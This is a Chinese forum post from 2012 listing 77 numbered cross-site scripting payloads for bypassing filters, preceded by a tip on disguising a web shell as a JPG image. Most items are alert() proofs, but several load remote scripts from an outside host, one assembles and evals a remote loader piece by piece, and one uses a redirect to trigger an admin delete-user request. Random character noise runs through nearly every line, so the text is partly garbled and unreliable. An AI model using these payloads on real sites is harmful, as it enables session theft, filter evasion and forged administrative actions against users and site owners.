跨站图片shell
, u; a/ d4 ]$ X" ]- H/ cXSS跨站代码 <script>alert("")</script>4 v, X5 D/ R/ A& ~/ o! v9 e- ^
% G8 `6 Z0 M% f- o将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马% ^! D5 g0 w. o: c
$ c* @" {3 ]; j+ q0 l* W" [! |8 O
C0 o3 d" X; H' w6 G& z! D$ B
, N% ?9 A ^, Y/ i% \' A% E6 H1)普通的XSS JavaScript注入
6 I- R' S8 C) [$ v0 o) u Z<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
2 x+ O6 I$ s4 h1 {: i- k
4 K- K0 p u8 }( i" |5 D5 V5 T4 V2 G(2)IMG标签XSS使用JavaScript命令
5 h i1 H( F" b9 G1 q) c0 ?<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
& I' p$ _' U6 s$ N% }* x& E7 l0 l' B* H* o6 z% u! B e) n6 j
(3)IMG标签无分号无引号" N7 {/ \! s) I2 o: Y
<IMG SRC=javascript:alert(‘XSS’)>
: H/ A3 r4 ?+ J8 B1 J1 v. q
3 m4 I2 ~/ d# J( }3 q- L5 V$ t: @(4)IMG标签大小写不敏感! C. M( M1 x+ b `& D# ^
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
4 {! m; i2 X0 _. T' g% E8 F. N- c' H0 ^' B+ F8 P* O% K0 O( E& I
(5)HTML编码(必须有分号)! Q: e; Q+ z0 D2 S5 Z
<IMG SRC=javascript:alert(“XSS”)>
! K) L3 s6 H3 k, q9 O8 Y1 X/ H2 Z1 g/ _6 }4 X
(6)修正缺陷IMG标签
4 _" R2 `# A. x, e, b; W<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
- l; |) a& n; u6 h5 G/ F0 [/ b8 ?+ }4 a, E: |+ f% g% q. j
(7)formCharCode标签(计算器)
/ Q: L" C9 J+ B8 V<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))># m+ L! B9 R3 T$ q4 m& v7 E! a# g8 A; A
. c3 _& m/ }8 u(8)UTF-8的Unicode编码(计算器)
# _: j' C! s! j0 E! D5 F<IMG SRC=jav..省略..S')>5 X3 I3 P0 {% V7 n; |% U5 v' n
5 s5 g/ _) h9 c: m
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
8 H$ I- M: R$ U6 }<IMG SRC=jav..省略..S')>3 Q: ^1 u( F8 T: Y
7 a8 H6 a' Y- q8 y. U(10)十六进制编码也是没有分号(计算器)7 \9 m9 G( B) B" B- @; r( N
<IMG SRC=java..省略..XSS')>
& a, N4 j& w& S9 U+ |3 z5 J- U6 m
, v4 a& j! a, f- g(11)嵌入式标签,将Javascript分开
, Q& a4 P/ H3 t. i4 U<IMG SRC=”jav ascript:alert(‘XSS’);”>
2 y* W# h6 u3 Z, S7 I/ M( M1 A, w2 _* p9 k# X% R4 w
(12)嵌入式编码标签,将Javascript分开
Z$ O* V$ x4 W1 W% g+ W0 _<IMG SRC=”jav ascript:alert(‘XSS’);”>
: V1 y$ m2 t: r9 V$ g6 |+ ~% q$ |0 s0 J( \! |- o* x
(13)嵌入式换行符5 k# O j# Q) V7 [+ S' n
<IMG SRC=”jav ascript:alert(‘XSS’);”>& ~% O! d% l6 k; `
/ U- W% u5 r/ d6 Q" M4 w(14)嵌入式回车4 ^" R( o$ X( m$ O$ B
<IMG SRC=”jav ascript:alert(‘XSS’);”>
7 m/ K: K! g4 @% `
2 ]! L9 K: G9 T% C. E7 X(15)嵌入式多行注入JavaScript,这是XSS极端的例子
+ B( I; q, G. }1 A2 P<IMG SRC=”javascript:alert(‘XSS‘)”>
2 D8 q% F; z! q7 ]4 ]9 K* Q# D
7 j5 ?: Y7 g: d8 A* Y% B5 ~(16)解决限制字符(要求同页面)
. V. X4 g9 u K# D( p" N% u<script>z=’document.’</script>
& k6 i) r3 F, }<script>z=z+’write(“‘</script>0 _2 A8 H5 A& q! J, A* _0 D
<script>z=z+’<script’</script>
5 }0 d1 a. }& c/ d<script>z=z+’ src=ht’</script>4 w# Y5 ^" G6 j# U$ `2 g, W
<script>z=z+’tp://ww’</script>
, B# T) \0 V9 A0 A- j; m<script>z=z+’w.shell’</script>" h; A" l1 p) t9 |4 x L; s
<script>z=z+’.net/1.’</script>
9 O: [! X Y( ?& H/ M& i) V4 h<script>z=z+’js></sc’</script>2 A+ L: k4 I4 r1 s0 d8 C8 g
<script>z=z+’ript>”)’</script>0 }5 o& \ ]& o8 S4 x. v$ D
<script>eval_r(z)</script>
: J+ A3 @& C; O9 |% M- y8 b: M" }) V/ [7 C
(17)空字符
- Q( ]& ^. v) _. j) j. Tperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out( c6 I4 L) c3 v4 e8 Y7 J
6 ]9 _8 l6 O& V% v* I7 ~* J(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用: g+ U! t# K* `9 T4 e8 s
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
* R' o- m- J2 y2 V- \; |3 j7 B; J
/ g; ~8 D$ ~/ V0 o% @0 h9 Z(19)Spaces和meta前的IMG标签+ q; E G; m! C9 ~8 R; {
<IMG SRC=” javascript:alert(‘XSS’);”> B7 j }! a3 o
: l/ w5 h( M; {/ E2 j. a! T
(20)Non-alpha-non-digit XSS
) L* A: y Q6 Q; s g" m" \0 l<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>* N6 ~! [0 w& T: a4 `+ K
# S7 I* l( s8 S; N* `2 ~(21)Non-alpha-non-digit XSS to 28 [& v* q' V5 G, I3 u0 ]$ a6 L' o
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>) s. a# c/ D+ i7 b# N G7 Q
* u6 l. h; x) i
(22)Non-alpha-non-digit XSS to 3' F/ m( b- E4 G6 A: R! c+ B) ^ _' T7 L
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
H6 C2 g3 R# Z7 Q& M( i2 E- \; T3 d. K& y
(23)双开括号
& @5 H0 j: ^; M1 n9 c1 z/ `& w<<SCRIPT>alert(“XSS”);//<</SCRIPT>
# `! z; n, y/ p/ o8 _8 s. q" b3 K2 x# {/ e
(24)无结束脚本标记(仅火狐等浏览器)
6 V" g6 K7 `1 ^4 |2 P5 ^' k2 M0 P<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>1 c3 j& ?9 e6 x# n& m
4 @# h4 l# k4 Z2 J! T
(25)无结束脚本标记2
+ c1 A, @3 o Q<SCRIPT SRC=//3w.org/XSS/xss.js>4 M' o" [* Q3 l2 i
" M6 A' q& _ A5 I) Q(26)半开的HTML/JavaScript XSS# `2 X8 I+ G% b: B
<IMG SRC=”javascript:alert(‘XSS’)”- x1 [& w. i' d/ n0 m @, q& |% s
. w5 N/ B& \2 G7 z) `9 Z0 C& ]+ L(27)双开角括号8 E* s, m, G4 [' A; x- r! J& v
<iframe src=http://3w.org/XSS.html <
6 k3 A* a; B& `7 n% y, f- W+ l: x# e5 c# K V
(28)无单引号 双引号 分号7 ?: @) T- |* W/ N; b. F
<SCRIPT>a=/XSS/" @, S- F+ { J- s8 C' W
alert(a.source)</SCRIPT>' }4 I9 B) ]3 E- r! n
+ s; G! d; n: Y; c
(29)换码过滤的JavaScript
$ g0 a1 p6 K" a* e8 u1 }8 f6 g( R$ W* o\”;alert(‘XSS’);//
8 c3 ?% b0 O1 L' _' b$ l9 }/ b3 I6 l, `9 f, y8 v
(30)结束Title标签
3 R f7 V) S/ M7 \' \ z; H: B5 [</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>3 I$ m# J. `3 c* r
; R' u6 `) r% ?3 S; W
(31)Input Image5 x/ k) E/ @- Z; ?
<INPUT SRC=”javascript:alert(‘XSS’);”>
* j- f$ E& y+ Q3 U$ @. l9 I7 ?2 b+ D& x) L3 V1 L
(32)BODY Image
4 Q5 W% \& L' o<BODY BACKGROUND=”javascript:alert(‘XSS’)”>- n/ g8 @4 o* W$ p: ]/ @
8 M5 C5 h. @: w
(33)BODY标签
0 Y, Y: y+ n6 V: ]<BODY(‘XSS’)>
" @5 n) g. a% S$ Z" |* ?: E' {) [- a t3 K1 n/ v
(34)IMG Dynsrc
( I" n, v! K6 @% ~ I r<IMG DYNSRC=”javascript:alert(‘XSS’)”>
/ ^- G) ^; ?0 U# q" S( g% ?- d$ X' a/ ~1 [
(35)IMG Lowsrc
4 ]! z8 }# r2 P% G7 B<IMG LOWSRC=”javascript:alert(‘XSS’)”>
# X& O( V4 Z- u' N2 F
( Q/ t$ Y% a4 n% W6 M(36)BGSOUND
4 k0 n ?1 b/ o/ `8 f3 Q<BGSOUND SRC=”javascript:alert(‘XSS’);”>+ |$ `# a" c* G" p( ^8 u( A4 v# h) `$ k
- i' h6 N/ |5 t8 D(37)STYLE sheet
/ o9 P; R5 ^! Y, c<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
r( @, N- z4 Q! g% l9 p y/ T3 O# Q
(38)远程样式表& J. ^8 u6 y+ ~8 @0 j
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
/ w" |0 T3 ^% _5 A/ r& O
) s1 c- D+ p$ F- a: j- ?, {(39)List-style-image(列表式)
# q/ k! S1 C6 y7 Y<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS# M! e5 h* ^- u0 M# Z
3 T& ]' z0 K1 t K! V) e: _/ c
(40)IMG VBscript0 _( t8 J- f% P* E: C
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
& E$ M- l" {; b- D r1 S& _, @0 ?
' P! B" ~" J& s(41)META链接url
7 h. u0 [- |! v+ G& F1 o<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>0 ~: z6 s& \- G, l" ~- C
: q [1 p) J5 q& R& s
(42)Iframe% c( O+ y) U0 c* X+ ~5 e7 M
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>5 a* W2 v d/ X/ ], y1 D1 T# [
(43)Frame1 o3 R( `; V n8 o S' _
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>. w; y% J d2 n \* k D0 t7 L* O* Z
) X% U$ w% l* ?; I5 Q. a. m
(44)Table" O; F/ c. k* ? l$ ^
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>! Z- m0 M/ o/ o5 g6 u0 n
6 G. D2 W; q) G! p" i8 g) o# U6 q(45)TD
. y! s- [' [! r<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
7 a( c: p' T5 v& e6 ?0 h4 a5 p- I3 @3 M6 m/ w
(46)DIV background-image3 l4 ]0 d. w1 D3 p- E8 x
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>; I, h& ^0 a& h0 [ C
$ T# {. b8 w$ I# C. E, f. w- @(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
$ t+ i4 d+ p! ]" P2 w! \<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”> n: K& V3 ?5 G' U( v
* w8 D1 ?( k' ~% k8 O
(48)DIV expression! R3 Y' w& ^- D- C
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>0 b8 D& E/ S0 h
3 m4 b# k$ b5 W4 \
(49)STYLE属性分拆表达" r/ H+ l+ c' x7 i6 E- ]( X. v
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>/ Q" u5 _# W) _' v2 r- \1 }, s
# o: U+ i1 I" F4 }( I0 A! o
(50)匿名STYLE(组成:开角号和一个字母开头)
! Y6 k3 l* n# B# O% X% n+ s<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>2 n9 q; d4 @. Z$ d; O: G
) q! a4 _: @( a8 |
(51)STYLE background-image
3 @( C; b, }) b" {' f1 e }<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
, `+ M% v) A" e8 M$ f. k6 t6 S
4 J6 t( ^7 s( C% B(52)IMG STYLE方式
9 H. u( V3 X d6 Y3 ?; E4 ^9 J7 jexppression(alert(“XSS”))’>
# H: }) L6 t- u" H$ C% V! a0 G3 z, x# O- ^
(53)STYLE background* j( i- \& {" ~' y7 X# j2 G
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
6 X3 ?0 m2 R0 Q; E) n5 V* j2 L- F" E! g' S e% l; Z2 \" P
(54)BASE" B; q& y% l& e Z0 y( m, F9 F
<BASE HREF=”javascript:alert(‘XSS’);//”>
. G( M/ t8 V3 B# h0 W$ \) Z0 |9 z. M8 l4 L% i
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS- U3 O; V) v* c
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
8 c/ |9 f3 X$ m: D& E$ z0 h1 i; L& f+ D" X$ z# x# w
(56)在flash中使用ActionScrpt可以混进你XSS的代码. M1 y c/ V" q3 V
a=”get”;. J- r) x; [/ R' v. M t: V
b=”URL(\”";
$ U& |- o5 P/ U6 h) ]c=”javascript:”;
9 A1 \. d, y+ T+ Bd=”alert(‘XSS’);\”)”;
& w3 a0 v# D5 I7 Ieval_r(a+b+c+d);7 s5 F/ p# M. [! l8 \
2 |& y# G! E. M+ F8 v; D8 L$ G, A
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
" [6 V$ Z/ d! h; V# W<HTML xmlns:xss>
! S# p/ |# l9 s: E8 Q<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
" k5 R3 y) q8 @<xss:xss>XSS</xss:xss>
4 O5 c& G' a$ k8 w) t( g</HTML>5 d) e, A8 q3 ?" T0 s0 Q9 P4 {
0 Q. k' a/ ^6 y3 ?7 {(58)如果过滤了你的JS你可以在图片里添加JS代码来利用$ c5 o2 O' C/ ^0 }* b# L
<SCRIPT SRC=””></SCRIPT>
9 J2 l2 A: r& d& A. ]. D/ L+ @6 M& d8 }2 }) ?5 V+ z' _+ l* g( f( [9 ?
(59)IMG嵌入式命令,可执行任意命令
- V$ }# \$ s( i' k! m6 n<IMG SRC=”http://www.XXX.com/a.php?a=b”>5 @2 u y p2 \0 b/ q* L
3 A; w8 `2 i1 ~2 L$ ]: v
(60)IMG嵌入式命令(a.jpg在同服务器)
+ S/ A/ @1 Z4 U. {Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser) o1 D: \9 ?+ b. B9 G4 s
& D3 H: v& L/ m$ L0 L8 {& _8 a
(61)绕符号过滤+ }7 d) Z v- V) t; R( D
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>0 l. O! Q) M8 J: y
# b* H+ k! v! P6 a7 h2 I
(62), P$ L4 K: g O# `
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>! G* G1 x1 R0 V5 B1 g
. t( o" M; X# A(63)+ G: E# _& X* S& w! k
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>( P0 d5 i2 L$ g) u5 K
7 q. p& \" E& x: c(64), o' e8 ]8 d9 Y C% } p
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
$ a3 H4 T( w/ ~+ i0 o% t- }" }7 G$ q
(65)" u b4 y7 F5 S4 G$ p% a- V+ `9 M
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>9 e/ @1 ~: x2 K) H6 b/ ~) ]
% R' p; C# l6 c4 k0 ?4 z6 l6 D9 k(66)! r9 f: @3 z* S8 e) r. y
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>' j- q I# R, `* O3 f: A
% W" G5 ^* V7 K" ^
(67)
. ]6 c5 P9 \# @7 c0 G) [<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>9 p* C# r9 g" E5 f0 Z5 C ~
1 A" j4 I7 ~3 _2 Z2 Q9 W v(68)URL绕行
6 C, d. i4 R/ h<A HREF=”http://127.0.0.1/”>XSS</A>7 k9 b( k s1 Z' L8 l8 ], `
1 M/ O/ Q% K5 @: E" t: O' E' J
(69)URL编码& d+ u2 Q8 H4 ^6 L0 H! j. H3 u8 L
<A HREF=”http://3w.org”>XSS</A># h% g& \0 {7 x3 E r3 l0 C3 Q
9 H; J! o q1 _5 J/ D l(70)IP十进制& ?( s; }3 X: Y, L
<A HREF=”http://3232235521″>XSS</A>/ {& Y/ y; P' k9 n" l) o
* K1 a# T8 V+ h7 {" r: X(71)IP十六进制0 C* j+ Y( H" Q2 i. a# l9 d. _7 s+ p
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
2 J# X, R5 }% L+ m' }( E% J; n+ m# t3 L: [* [& \& O4 T7 P9 v
(72)IP八进制& u/ `' S5 |7 ?0 p4 G
<A HREF=”http://0300.0250.0000.0001″>XSS</A>- m4 d# y. i+ a) r1 [
6 _" Z2 V. s; ?
(73)混合编码2 A/ k5 u1 p, T, |0 v' D3 a
<A HREF=”h
2 `" O2 @. ~$ C6 M' T% ?* y3 G" U) wtt p://6 6.000146.0×7.147/”">XSS</A>
) A+ c3 H: ?, t7 z. t7 X
0 p" ~/ h) E Z/ ?" U) t(74)节省[http:]
) d( q( k- n, [2 L9 r2 w( p<A HREF=”//www.google.com/”>XSS</A>
3 Y. w- Q# x! m9 O6 G% a& s6 n0 r! a3 N1 x
(75)节省[www]
' D, M" @8 k: P" w" M<A HREF=”http://google.com/”>XSS</A>, P E8 M' l" L; V0 ^- v" g
4 a/ t( ? O. L+ ]" q1 U% C
(76)绝对点绝对DNS* d! @( w4 h! s8 v1 j" q8 {
<A HREF=”http://www.google.com./”>XSS</A>7 N: k3 G& G5 U% S
4 T4 K! W0 L* z: ?1 Q
(77)javascript链接
8 ?( D6 V9 g0 p" q5 e; c<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
. |* c. ?1 m0 a' i |
发表于 2012-9-13 17:04:56
收藏
支持
反对